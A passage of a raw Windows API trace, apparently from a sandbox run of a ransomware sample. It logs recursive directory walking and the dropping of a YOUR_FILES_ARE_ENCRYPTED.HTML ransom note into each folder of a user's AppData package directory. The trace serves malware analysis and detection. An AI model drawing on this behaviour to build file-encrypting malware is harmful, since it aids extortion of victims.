[0118.767] GetProcessHeap () returned 0x600000 [0118.767] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.767] GetProcessHeap () returned 0x600000 [0118.767] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0118.768] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a7f62ab, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8a7f62ab, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8a7f62ab, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5da8, dwReserved1=0x6f5cd8, cFileName="Temp", cAlternateFileName="")) returned 0 [0118.768] FindClose (in: hFindFile=0x626878 | out: hFindFile=0x626878) returned 1 [0118.768] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 136 [0118.768] GetProcessHeap () returned 0x600000 [0118.768] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0118.769] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\ac\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0118.769] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0118.770] CloseHandle (hObject=0x324) returned 1 [0118.770] GetProcessHeap () returned 0x600000 [0118.770] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.770] GetProcessHeap () returned 0x600000 [0118.770] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0118.771] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a7d0053, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8a7d0053, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8a7d0053, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AppData", cAlternateFileName="")) returned 1 [0118.771] StrStrIW (lpFirst="AppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.771] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AppData") returned 111 [0118.771] GetProcessHeap () returned 0x600000 [0118.771] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0118.772] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AppData" [0118.772] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AppData\\*" [0118.772] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a7d0053, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8a7d0053, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8a7d0053, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5da8, dwReserved1=0x6f5cd8, cFileName=".", cAlternateFileName="")) returned 0x626638 [0118.772] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a7d0053, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8a7d0053, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8a7d0053, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5da8, dwReserved1=0x6f5cd8, cFileName="..", cAlternateFileName="")) returned 1 [0118.772] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a7d0053, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8a7d0053, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8a7d0053, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5da8, dwReserved1=0x6f5cd8, cFileName="..", cAlternateFileName="")) returned 0 [0118.772] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0118.772] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 141 [0118.772] GetProcessHeap () returned 0x600000 [0118.772] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0118.772] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\appdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0118.773] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0118.774] CloseHandle (hObject=0x324) returned 1 [0118.774] GetProcessHeap () returned 0x600000 [0118.774] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.774] GetProcessHeap () returned 0x600000 [0118.774] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0118.774] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a7a9d6d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8a7a9d6d, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8a7a9d6d, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0118.774] StrStrIW (lpFirst="LocalCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.774] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalCache") returned 114 [0118.774] GetProcessHeap () returned 0x600000 [0118.775] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0118.775] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalCache" [0118.775] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalCache\\*" [0118.775] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalCache\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a7a9d6d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8a7a9d6d, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8a7a9d6d, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5da8, dwReserved1=0x6f5cd8, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0118.776] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a7a9d6d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8a7a9d6d, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8a7a9d6d, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5da8, dwReserved1=0x6f5cd8, cFileName="..", cAlternateFileName="")) returned 1 [0118.776] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a7a9d6d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8a7a9d6d, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8a7a9d6d, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5da8, dwReserved1=0x6f5cd8, cFileName="..", cAlternateFileName="")) returned 0 [0118.776] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0118.776] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 144 [0118.776] GetProcessHeap () returned 0x600000 [0118.776] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0118.776] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0118.777] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0118.777] CloseHandle (hObject=0x324) returned 1 [0118.777] GetProcessHeap () returned 0x600000 [0118.777] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.777] GetProcessHeap () returned 0x600000 [0118.778] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0118.778] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a7a9d6d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x1205e7f4, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x1205e7f4, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0118.778] StrStrIW (lpFirst="LocalState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.778] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState") returned 114 [0118.778] GetProcessHeap () returned 0x600000 [0118.778] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0118.779] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState" [0118.779] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\*" [0118.779] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a7a9d6d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x1205e7f4, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x1205e7f4, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5da8, dwReserved1=0x6f5cd8, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0118.779] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a7a9d6d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x1205e7f4, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x1205e7f4, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5da8, dwReserved1=0x6f5cd8, cFileName="..", cAlternateFileName="")) returned 1 [0118.779] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x72848ccf, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x3032309b, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x3032309b, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5da8, dwReserved1=0x6f5cd8, cFileName="Assets", cAlternateFileName="")) returned 1 [0118.779] StrStrIW (lpFirst="Assets", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.780] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets") returned 121 [0118.780] GetProcessHeap () returned 0x600000 [0118.780] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0118.781] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets" [0118.781] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\*" [0118.781] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x72848ccf, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x3032309b, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x3032309b, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187a00, dwReserved1=0x6f5ce0, cFileName=".", cAlternateFileName="")) returned 0x626638 [0118.781] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x72848ccf, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x3032309b, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x3032309b, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187a00, dwReserved1=0x6f5ce0, cFileName="..", cAlternateFileName="")) returned 1 [0118.781] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9155d1de, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x9155d1de, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x9259b185, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0xd5d0, dwReserved0=0x3187a00, dwReserved1=0x6f5ce0, cFileName="17babfd54fdf4809aa9630faf6e0bb5e2ed3436ae4e34b458c9754cc06c14aea", cAlternateFileName="17BABF~1")) returned 1 [0118.781] StrStrIW (lpFirst="17babfd54fdf4809aa9630faf6e0bb5e2ed3436ae4e34b458c9754cc06c14aea", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.781] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\17babfd54fdf4809aa9630faf6e0bb5e2ed3436ae4e34b458c9754cc06c14aea") returned 186 [0118.781] PathFindExtensionW (pszPath="17babfd54fdf4809aa9630faf6e0bb5e2ed3436ae4e34b458c9754cc06c14aea") returned="" [0118.781] lstrlenW (lpString="") returned 0 [0118.781] PathFindExtensionW (pszPath="17babfd54fdf4809aa9630faf6e0bb5e2ed3436ae4e34b458c9754cc06c14aea") returned="" [0118.781] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9161bed5, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x9161bed5, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x9259b185, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x9cf9, dwReserved0=0x3187a00, dwReserved1=0x6f5ce0, cFileName="24c2b0732aff4f44b3c61ce6b30608d9c4122c719d4bd400e1a9516f85cd10ed", cAlternateFileName="24C2B0~1")) returned 1 [0118.781] StrStrIW (lpFirst="24c2b0732aff4f44b3c61ce6b30608d9c4122c719d4bd400e1a9516f85cd10ed", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.782] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\24c2b0732aff4f44b3c61ce6b30608d9c4122c719d4bd400e1a9516f85cd10ed") returned 186 [0118.782] PathFindExtensionW (pszPath="24c2b0732aff4f44b3c61ce6b30608d9c4122c719d4bd400e1a9516f85cd10ed") returned="" [0118.782] lstrlenW (lpString="") returned 0 [0118.782] PathFindExtensionW (pszPath="24c2b0732aff4f44b3c61ce6b30608d9c4122c719d4bd400e1a9516f85cd10ed") returned="" [0118.782] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e47809c, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x2e47809c, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x2f10f5fd, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x9ac9f, dwReserved0=0x3187a00, dwReserved1=0x6f5ce0, cFileName="544f2ac49033bd876a2cc4aaf7e27b5245ae2b0609023fa6f5802845d98a8452", cAlternateFileName="544F2A~1")) returned 1 [0118.782] StrStrIW (lpFirst="544f2ac49033bd876a2cc4aaf7e27b5245ae2b0609023fa6f5802845d98a8452", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.782] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\544f2ac49033bd876a2cc4aaf7e27b5245ae2b0609023fa6f5802845d98a8452") returned 186 [0118.782] PathFindExtensionW (pszPath="544f2ac49033bd876a2cc4aaf7e27b5245ae2b0609023fa6f5802845d98a8452") returned="" [0118.782] lstrlenW (lpString="") returned 0 [0118.782] PathFindExtensionW (pszPath="544f2ac49033bd876a2cc4aaf7e27b5245ae2b0609023fa6f5802845d98a8452") returned="" [0118.782] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76f36cad, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x76f36cad, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x7afe28de, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x5b9, dwReserved0=0x3187a00, dwReserved1=0x6f5ce0, cFileName="6b7dd9dad158021e2c664e8b60be0b1711e94c497879b603276f90f91602c813", cAlternateFileName="6B7DD9~1")) returned 1 [0118.782] StrStrIW (lpFirst="6b7dd9dad158021e2c664e8b60be0b1711e94c497879b603276f90f91602c813", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.782] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\6b7dd9dad158021e2c664e8b60be0b1711e94c497879b603276f90f91602c813") returned 186 [0118.782] PathFindExtensionW (pszPath="6b7dd9dad158021e2c664e8b60be0b1711e94c497879b603276f90f91602c813") returned="" [0118.782] lstrlenW (lpString="") returned 0 [0118.782] PathFindExtensionW (pszPath="6b7dd9dad158021e2c664e8b60be0b1711e94c497879b603276f90f91602c813") returned="" [0118.782] 